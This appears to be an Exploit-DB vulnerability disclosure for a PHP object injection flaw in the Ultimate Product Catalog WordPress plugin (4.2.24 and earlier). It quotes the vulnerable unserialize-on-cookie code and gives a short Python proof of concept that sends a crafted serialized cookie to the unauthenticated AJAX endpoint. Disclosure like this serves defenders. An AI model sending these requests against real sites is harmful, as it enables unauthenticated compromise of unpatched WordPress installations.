WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection

EDB-ID:

43065

CVE:

N/A




Platform:

PHP

Date:

2017-10-30


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection]
# Google Dork: [NA]
# Date: [Okt 30 2017]
# Exploit Author: [tomplixsee]
# Author blog : [cupuzone.wordpress.com]
# Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/]
# Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/]
# Version: [<= 4.2.24] 
# Tested on: [Ubuntu Server 16.04]
# CVE : [NA]

tested on app version 4.2.23, 4.2.24

we can send an evil cookie (login not required) to vulnerable function
1. vulnerable code on Functions/Process_Ajax.php <= tested

   203 // Adds an item to the plugin's cart
   204 function UPCP_Add_To_Cart() {
   205 global $woocommerce;
   206 global $wpdb;
   207 global $items_table_name;
   208
   209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout");
   210
   211 if ($WooCommerce_Checkout == "Yes") {
   212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID'])));
   213 echo "WC ID: " . $WC_Prod_ID . "<Br>";
   214 $woocommerce->cart->add_to_cart($WC_Prod_ID);
   215 }
   216
   217 if (isset($_COOKIE['upcp_cart_products'])) {
   218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products']));
   219 }
   220 else {
   221 $Products_Array = array();
   222 }
   223
   224 $Products_Array[] = $_POST['prod_ID'];
   225 $Products_Array = array_unique($Products_Array);
   226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/");
   227 }
   228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart');
   229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' );

2. vulnerable code on Functions/Shortcodes.php <= not tested
  
POC
1. use a WP plugin to test php object injection, 
like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/

2. make a request 
#-----------------------------------
#! /usr/bin/python
import requests
url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?";
data = {'action':'upcp_add_to_cart'}
headers = {
'Content-type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}'
}
r = requests.post(url, data=data, headers=headers)

print r.content

#------------------------------------